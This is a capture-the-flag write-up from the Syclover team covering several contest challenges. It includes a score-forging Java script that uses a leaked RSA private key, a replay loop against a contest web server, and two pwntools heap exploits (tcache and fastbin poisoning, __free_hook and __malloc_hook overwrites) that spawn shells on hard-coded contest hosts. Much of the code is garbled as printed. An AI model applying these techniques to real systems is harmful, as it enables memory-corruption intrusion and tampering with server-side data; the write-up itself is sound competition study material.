'数字安全'云安全公测大赛 Write-Up



'数字安全'云安全公测大赛 Write-Up

  • misc

    • 签到

    • ewm

    • findme

  • web

    • gameapp

  • Pwn

    • amazon

    • fkroman


Misc

01

02

签到

 

签到题直接给了flag

02

ewm

  • solved by 0xPoker


讨论区:
…好像就是一个二维码拼接一下

拼完了,逆向真难顶


flag{g00d_g00d_study_1jf8988}


03

findme

  • solved by r1ngs

脚本如下（二分查找法）:


#-*- coding=utf-8 -*-

from socket import *
import string
from re import *

def connect(host, port):
    """Open a TCP connection to ``(host, port)`` and hand back the connected socket."""
    sock = socket(AF_INET, SOCK_STREAM)
    sock.connect((host, port))
    return sock

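def i2h(num):
    """Return ``num`` as lowercase hex text without the ``0x`` prefix.

    ``format`` never emits Python 2's ``L`` suffix for longs, so no
    ``rstrip('L')`` is needed, and unlike ``hex(num)[2:]`` it keeps the sign
    of a negative input instead of returning garbage such as ``'x5'``.
    """
    return format(num, 'x')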

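def send(s, num):
    """Consume the server's pending prompt, then submit ``num`` as bare hex.

    The prompt that was read and the hex text actually sent are both printed
    so the exchange is visible in the log.  ``sendall`` is used rather than
    ``send`` so a short write cannot silently truncate the guess.
    """
    print(s.recv(1024))
    payload = i2h(num)
    print(payload)
    s.sendall(payload.encode('ascii'))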

def get_flag(s, bottom, top, g1, g2, count):
    """Final probe once the [g1, g2] window is narrower than ten values.

    Each round replays the outer bounds, then submits ``g1`` (advanced by
    ``count`` every round) twice and prints whatever the server answers.
    ``g2`` is accepted for signature compatibility but is not used.
    NOTE(review): the step is ``count`` per round rather than 1, so for
    count > 1 some candidates inside the window are never tried — confirm
    against the original intent.
    """
    guess = g1
    for _ in range(count):
        print('======= try to get flag ========')
        for bound in (bottom, top):
            send(s, bound)
        guess += count
        send(s, guess)
        send(s, guess)
        print(s.recv(1024))

def main():
    """Narrow the hidden value using the server's two-way hint, then call get_flag.

    Each round sends four numbers (bottom, top, g1, g2) through ``send`` and
    reads one reply; the reply decides which way the [g1, g2] window moves.
    Host and port are hard-coded to the contest instance.
    """
    host ='121.40.216.20'
    port = 9999
    s = connect(host, port)

    bottom = 0
    top = 2**128

    # Scan [bottom, top] in thirds; Python 2 '/' keeps this an integer.
    block = abs(top-bottom)/3+1
    g1 = bottom
    g2 = block
    flag = 0   # becomes 1 once the server has answered '1' at least once
    tg1 = g1   # NOTE(review): assigned here and below but never read
    tg2 = g2
    for _ in range(200):
        if abs(g1-g2) < 10:
            get_flag(s, bottom, top, g1, g2, abs(g1-g2))
        send(s, bottom)
        send(s, top)

        send(s, g1)
        send(s, g2)

        mid = (g1+g2)/2
        remess = s.recv(1024)
        if remess == '1n'# NOTE(review): the ':' is missing and '1n'/'2n' are most likely '1\n'/'2\n' with the backslash lost in extraction; as printed this block does not parse
            print 1
            flag = 1
            tg1 = g1
            tg2 = g2
            tmid = mid

            g2 = mid   # reply '1': keep the lower half of the window

        elif remess == '2n':
            print 2
            if flag == 1:
                g1 = tmid   # reply '2' after an earlier '1': upper half of the last good window
                g2 = tg2
            else:
                g1 = g2     # no hit yet: slide the window one block upward
                g2 += block
        else:
            print remess
        print 'count'+str(_)
        print '+'*50



if __name__ == '__main__':
    # Script entry point: main() connects to its hard-coded host/port and runs the search.
    main()

flag : flag{flag_server_boomboom_guess}


WEB

02

01

gameapp

  • solved by  evoA


我的伪造Java脚本

import org.junit.Test;
import org.springframework.util.Base64Utils;
import sun.misc.BASE64Decoder;

import javax.crypto.Cipher;
import java.security.Key;
import java.security.KeyFactory;
import java.security.interfaces.RSAPrivateKey;
import java.security.spec.PKCS8EncodedKeySpec;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;

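public class Test001 {
    /**
     * Key material copied from the target application (per the write-up):
     * index 0 is the X.509 public key, index 1 the PKCS#8 private key.
     * Because the private key is available to the client, anything produced
     * with it can be produced by any user, so the server cannot treat the
     * resulting blob as proof of origin.
     */
    private static final Map<Integer, String> keyMap = new HashMap<>();

    @Test
    public void test001() {
        // Intentionally empty placeholder left by the author.
    }

    /**
     * Builds the score payload in the format the game expects: the JSON text
     * is RSA/PKCS#1 v1.5 "encrypted" with the PRIVATE key and Base64-encoded.
     * Encrypting with a private key is not a signature; a real signature
     * scheme (java.security.Signature) with a key the client does not hold
     * is what would actually bind the data to a trusted origin.
     *
     * @throws Exception on any JCA failure (bad key spec, padding, ...)
     */
    @Test
    public void private_encrypt() throws Exception {
        // Backslash escapes restored: the original JSON had lost them in extraction.
        String paramString = "{\"op\":\"add\",\"score\":999}";
//      String paramString = "{\"player\":\"evoA\"}";
        keyMap.put(0, "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCqtXUIVoPUcBV1Wl3g8rGGNvMYnImonQdMC1Y8USwIwf7Y0GcBP/h6fAJPAS9//qYZzy8ZfDKH1+ezifFFCUTCCa/8anYFoms223okyzeTlUIRHbIkto1JxYOazbsE6+KmE+yJiij4839SYuC1KsLWT82uHEnA3Hau/DTzW4g4xhvzQIDAQAB");
        keyMap.put(1, "MIICeAIBADANBgkqhkiG9w0BAQEFAASCAmIwggJeAgEAAoGBAKq1dQhWg9RwFXVanXeDysYY28xgiaidB0wLVjxRLAjB/tjQZwE/+Hp8Ak8BL3/+phnPLxl8MofX57OJ8nUUJRMIJr/xpgWiazbbeiTLN5OVQhEdsiS2jUnFg5rNuwTr4qYT7ImKKPjzf1Ji4LnUqwtZPza4cQDcdq78NPNbiDjGG/NAgMBAAECgYBUdazusCdPbxke09QI3Oq6VeuWncEiHHckx6Ml+p9Hwfu99/ZOpwDgUQSvZA3FTQ+PS3OpL0qs7USlDsXBe2F6gCZ/en1BvkEPE/FymHbzbSpr8BwjEel/kup842z11SujNxHbeznrXKNfvDlqR5HM7CurYEnrBW0X8She8lNAqXBXQJBANj3pPvSHFQ4ugkWst6XCX/gd5vQuvPzeUwHpReSdRsmnA6Jmv8oP03MQzjvsyrMoPatMzhN5Qtfpw12Febfl1pcCQQDJa2RGtK2jCiKxzKcbnUp9pPiSxtsdavneKoCG/tndICyGfeT1NRGSQsJCHIhxdee4QQYWUrzhbFBLLZDq4nsj07AkEAykt0T7si4MAXbPv2AKZQnCN9QhGHDof3k5UZL/ZFK+/wuY4Vyl+hJosHnz0XD5PFjNoGhLvUEBu6VUnBuAbHRtwJBAKysnHLhQlqbvdKfmEMcOf2HgP25rH5mn+ySk00n/q5LfuBt3XM54653/QGgZHigk96qIAXTOIooyU0p6yry8UTECQQCy8tufnlq8/8ISRdkHixENX+APeYr4hjmn5mUFJgB4qFUp1ReR0nA2oGf6IkzAWEwLvEchunKMtF7eEv1kHS+3Wd");
        // java.util.Base64 replaces the Tomcat codec: no container class needed for a plain decode.
        byte[] pkcs8 = Base64.getDecoder().decode(keyMap.get(1));
        RSAPrivateKey privateKey = (RSAPrivateKey) KeyFactory.getInstance("RSA")
                .generatePrivate(new PKCS8EncodedKeySpec(pkcs8));
        Cipher cipher = Cipher.getInstance("RSA/ECB/PKCS1Padding");
        // Cipher.ENCRYPT_MODE == 1, the bare literal the original passed.
        cipher.init(Cipher.ENCRYPT_MODE, privateKey);
        byte[] res = Base64.getEncoder().encode(cipher.doFinal(paramString.getBytes("UTF-8")));
        System.out.println(new String(res));
    }
}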

pom.xml

<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">

    <modelVersion>4.0.0</modelVersion>

    <groupId>me.evoA.springboot001</groupId>
    <artifactId>springboot001</artifactId>
    <version>1.0-SNAPSHOT</version>
    <!-- 指定Spring Boot的版本 2.0.4.RELEASE -->
    <parent>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-parent</artifactId>
        <version>2.0.4.RELEASE</version>
    </parent>

    <dependencies>
        <!-- 导入 Spring Boot web 所需的 jar 包 -->
        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-web</artifactId>
        </dependency>
        <dependency>
            <groupId>junit</groupId>
            <artifactId>junit</artifactId>
            <version>4.12</version>
            <scope>test</scope>
        </dependency>
        <dependency>
            <groupId>net.sf.json-lib</groupId>
            <artifactId>json-lib</artifactId>
            <version>2.4</version>
            <scope>test</scope>
        </dependency>
    </dependencies>

</project>

PS: Content-Type 必须是 xxx，否则会失败。
感觉题目要99999分 
com/ispring/gameplane/game/GameView.java 中有一个 addScore 方法：JSON 数据经 RSA 加密后发送，已经可以伪造。直接加 999 会被 check 拦下，加 99 则可以通过。
注意发一次替换一次cookie
替换cookie 就好了

import requests


# The same pre-built blob is posted repeatedly: the write-up relies on the
# server accepting an identical ciphertext again and again (no nonce or
# per-request binding), so only the session cookie has to stay current, and
# the Session object carries the updated cookie after the first request.
SCORE_URL = "http://121.40.219.183:9999/score/"
SIGNED_SCORE = "TWmIYQfp60aWjJH9kWjSB+OgWmyqiJJaGakyS1YXHcdpVzQVLoxC2/DBgFs19HGU8suk9togBAjGpM4KOvDbSh/yL+VEtg9LzSmaWdvMV6KM6NsXLKXdHhhDHwP/iOm1ceAkV9qBvs6jaPu4Luy1DxsF1FOynJFBAdAUpT+EQN0="

rrr = requests.Session()
res = rrr.post(
    url=SCORE_URL,
    data=SIGNED_SCORE,
    headers={
        "Content-Type": "xxx",
        "cookie": "session=eyJwbGF5ZXIiOiJldm9BIiwic2NvcmUiOjQwMH0.XYRtdg.Y98UCi-ehTiQawFO2wclehVegVE",
    },
)
for _ in range(1000):
    res = rrr.post(url=SCORE_URL, data=SIGNED_SCORE, headers={"Content-Type": "xxx"})
    print(res.text)



Pwn

03

01

amazon


  • solved by  骑麦兜看落日

利用 unsortedbin 合并然后利用 unsortedbin overlap 修改 tcache 表的 fd 位

修改 free_hook 为 system

覆盖 free_hook 使向上申请 覆盖 锁 为0

#!/usr/bin/python2.7  
# -*- coding: utf-8 -*-
from pwn import *
context.log_level = "debug"  # log every byte exchanged with the target
context.arch = "amd64"       # required for p64()/u64() and the gdb helper
# Binary driven by the menu wrappers below; the matching libc is chosen in __main__.
exe = './amazon'
elf = ELF(exe)

# NOTE(review): separators were lost in extraction (compare the `onegadgets`
# list in the next script); as printed this does not parse. `one` is not
# referenced anywhere else in this script.
one = [0x4f2c50x4f3220x10a38c]

#------------------------------------
def d(s = ''):
    """Attach gdb to the live target ``p``, feeding ``s`` as the gdb script."""
    gdb.attach(p, gdbscript=s)

def manu(idx):
    """Answer the 'choice: ' menu prompt with option number ``idx``."""
    option = str(idx)
    p.sendlineafter('choice: ', option)

def add(num, size, note):
    """Menu option 1: answer 'buy: ' with 1, 'many: ' with ``num``, 'note: ' with
    ``size``, then send ``note`` as-is (no trailing newline)."""
    manu(1)
    answers = (('buy: ', 1), ('many: ', num), ('note: ', size))
    for prompt, value in answers:
        p.sendlineafter(prompt, str(value))
    p.send(note)


def add1(num, size, note):
    """Variant of ``add`` that writes num/size/note with ``sendline`` without
    waiting for the later prompts.  Not used by ``pwn()``."""
    manu(1)
    p.sendlineafter('buy: ', '1')
    for line in (str(num), str(size), note):
        p.sendline(line)

def show():
    """Select menu option 2 (show); the caller reads the output itself."""
    option = 2
    manu(option)

def checkout(idx):
    """Menu option 3: check out item ``idx``."""
    manu(3)
    item = str(idx)
    p.sendlineafter('for: ', item)

def pwn():
    """Drive the remote menu in the sequence the write-up describes above.

    NOTE(review): most calls below lost their argument separators in
    extraction (e.g. ``add(20x80'a')``, ``ljust(8'x00')``) and backslash
    escapes were flattened to a bare ``x``; as printed this function does
    not parse, so the steps can only be read from this page, not re-run.
    The constant 0x3ebca0 is tied to the libc selected in __main__
    (libc-2.27.so for the remote branch) and differs for any other build.
    """
    add(20x80'a')  #0
    add(20xa0'A')  #1
    add(20x90'A')  #2
    add(20x10'A')  #4
    for i in range(8):
        checkout(0)

    for i in range(8):
        checkout(2)

    # Leak: the 6 bytes following 'Name: ' minus the build-specific offset give the libc base.
    show()
    p.recvuntil('Name: ')
    libc.address = u64(p.recv(6).ljust(8'x00')) - 0x3ebca0
    success('libc.address--->'+hex(libc.address))
    for i in range(8):
        checkout(1)

    # Overwrite stage described in the prose above (__free_hook -> system);
    # sizes and offsets are specific to this binary/libc pair.
    add(20x100'xff'*0x80 +p64(3)+p64(0xa1) + p64(libc.sym['__free_hook']-0x40))
    checkout(0)
    add(20xa0'a')
    add(20x100'xff'*0x80 +p64(3)+p64(0xa1) + '/bin/shx00')
    add(20xa0'x00'*0x20+p64(libc.sym['system']))
    #d()
    checkout(5)

    p.interactive()
#-------------------------------------
if __name__ == '__main__':
    # l != 0: spawn ./amazon locally against the system libc;
    # l == 0: connect to the contest instance and use the shipped libc-2.27.so.
    # The hard-coded offset in pwn() must match whichever libc is actually in use.
    l = 0
    if l:
        p = process(exe)
        libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
    else:
        p = remote('121.41.38.38'9999)
        libc = ELF('libc-2.27.so')

    pwn()

02

fkroman

  • solved by  骑麦兜看落日

程序存在一个UAF和heap overflow,先通过fastbin attack打iofile leak出libc地址,然后再通过fastbin attack打malloc_hook来getshell

#!/usr/bin/env python2

from pwn import *
# NOTE(review): the three terminal strings are adjacent literals whose commas
# were lost in extraction, so Python concatenates them into the single element
# 'tmuxsplitw-h'; this still parses but is not what was intended.
context(log_level='debug', arch='amd64', os='linux', terminal=['tmux''splitw''-h'])

exe = './fkroman'
lib = './libc-2.23.so'      # the libc the offsets below were computed against
ip = '121.40.246.48'        # endpoint used by the remote branch in __main__
port = 9999
elf = ELF(exe)
libc = ELF(lib)


def dbg(script=''):
    """Attach gdb to the running target ``io``, running ``script`` on attach."""
    attach(target=io, gdbscript=script)

def choice(idx):
    """Answer the 'Your choice: ' menu prompt with ``idx``."""
    selection = str(idx)
    io.sendlineafter('Your choice: ', selection)

def index(idx):
    """Answer the 'Index: ' prompt with slot number ``idx``."""
    slot = str(idx)
    io.sendlineafter('Index: ', slot)

def add(idx, size):
    """Menu option 1 for slot ``idx``, answering 'Size: ' with ``size``."""
    choice(1)
    index(idx)
    wanted = str(size)
    io.sendlineafter('Size: ', wanted)

def dele(idx):
    """Menu option 3 for slot ``idx``."""
    option = 3
    choice(option)
    index(idx)

def edit(idx, size, content):
    """Menu option 4 for slot ``idx``: answer 'Size: ' with ``size`` and then
    write ``content`` raw after the 'Content: ' prompt (no newline appended)."""
    choice(4)
    index(idx)
    io.sendlineafter('Size: ', str(size))
    io.sendafter('Content: ', content)

# ------------------------------------------------
LOCAL = 0               # 0: connect to ip:port; non-zero: run ./fkroman locally
iofile_off = 0x25dd     # packed with p16() in exp(); specific to the libc above
libc_off = 0x3c5600     # subtracted from the leaked pointer to obtain libc.address
# NOTE(review): separators lost in extraction; as printed this list does not
# parse. exp() reads index 1 of it.
onegadgets = [0x452160x4526a0xf02a40xf1147]
# ------------------------------------------------


def exp():
    """Run the two stages the prose above describes: leak libc, then __malloc_hook.

    NOTE(review): argument separators were lost in extraction on most calls
    (e.g. ``add(00x70-8)`` is presumably ``add(0, 0x70-8)``) and backslash
    escapes such as the trailing ``'x00'`` were flattened; as printed this
    function does not parse. iofile_off / libc_off / onegadgets are tied to
    the libc loaded at module level (./libc-2.23.so) and differ for any
    other build.
    """
    add(00x70-8)
    add(10x70-8)
    add(20x90-8)
    add(30x20-8)

#-------------------leak libc---------------------
    dele(1)
    dele(0)
    dele(2)
    edit(01, p8(0xe0))
    edit(10x70'A'*0x68+p64(0x71))
    edit(22, p16(iofile_off))

    add(40x70-8)
    add(50x70-8)
    add(60x70-8)

    edit(60x54'A'*3+p64(0)*6+p64(0x00000000fbad1800)+p64(0)*3+'x00')

    io.recv(0x40)

    # 8 raw bytes minus libc_off give the library base for the loaded libc.
    libc.address = u64(io.recv(8)) - libc_off
    log.info(hex(libc.address))

#-------------------malloc_hook-------------------
    add(70x70-8)
    edit(70x70'B'*0x68+p64(0x21))
    dele(7)
    edit(78, p64(libc.sym['__malloc_hook']-0x23))
    add(80x70-8)
    add(90x70-8)
    edit(90x1b'C'*0x13+p64(libc.address+onegadgets[1]))

    add(80)   # final allocation; the prose above expects the hook to fire here

    #dbg()

    io.interactive()


# ------------------------------------------------
if __name__ == '__main__':

    # LOCAL selects a local process (the LD_PRELOAD hint is left commented out
    # by the author) or the remote endpoint defined at module level.
    if LOCAL:
        io = elf.process()#env={"LD_PRELOAD": libc.path})
    else:
        io = remote(ip, port)

    exp()



三叶草小组

新浪微博:@三叶草小组Syclover


在与你相遇的路上马不停蹄~





原文始发于微信公众号(三叶草小组Syclover):'数字安全'云安全公测大赛 Write-Up
